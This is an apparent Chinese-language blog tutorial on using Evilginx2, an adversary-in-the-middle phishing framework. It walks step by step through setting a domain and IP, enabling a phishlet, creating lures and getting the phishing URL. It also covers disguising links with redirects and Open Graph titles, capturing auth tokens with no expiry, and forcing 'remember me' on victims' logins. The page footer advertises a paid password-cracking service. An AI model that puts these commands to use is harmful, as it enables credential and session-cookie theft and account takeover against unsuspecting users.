top of page

Evilginx2用法

作家相片: Timmy TSENGTimmy TSENG

已更新:2024年4月14日

下載並安裝啟動evilginx主程式

make

sudo ./evilginx -p ../phishlets/

配置域名DNS


在evilginx配置域名

config domain sex666vr.com

配置evil釣魚主機名 phishlets hostname name sex666vr.com

配置evilginx IP的中

config ipv4 35.194.170.251

啟動指定模板

phishlets enable name

查看模板啟動狀態

phishlets

添加路由

lures create namecheap

lures

取得釣魚網站地址

lures get-url 0

訪問釣魚頁面







更改默認未授權跳轉頁面

/root/.evilginx

在此路徑下更改默認域名及相關設定



調整path

lures edit 0 path /download/123

調整hostname

lures edit 0 hostname timmy.test.test.com

調整重定向跳轉地址

lures edit 0 redirect_url truewebsit.com

調整釣魚連接title

lures edit 0 og_title = true_website

調整釣魚連接圖標

lures edit 0 og_url = 'http:123.com"


調整auth-token 抓取沒有到期時間的token

token ['token:always']


還有個功能自動保持登入,可以預先幫用戶勾選

phlist 加入force_post

username password 用search來

rememberme :1 force

type post







215 次查看0 則留言

最新文章

查看全部

Excel Word zip 7z等檔案密碼破解收費方式

本站使用GPU顯卡密碼破解可大幅加快破解速度 可支持中文字典方式密碼破解請TG詳談 詳細請TG聯繫詳談:jimmygou0302 密碼破解教學請看此篇文章 https://www.pentesthome.com/profile/qoo7972365/profile

Jenkins 任意文件讀取 CVE-2024-23897

Jenkins文件讀取漏洞(CVE-2024-23897) 漏洞原理 Jenkins通过命令行接口允许使用jenkins-cli.jar客户端执行功能。 服务端解析命令行时,使用第三方库args4j,该库支持@符号引导的文件名作为参数值。...

Comments


bottom of page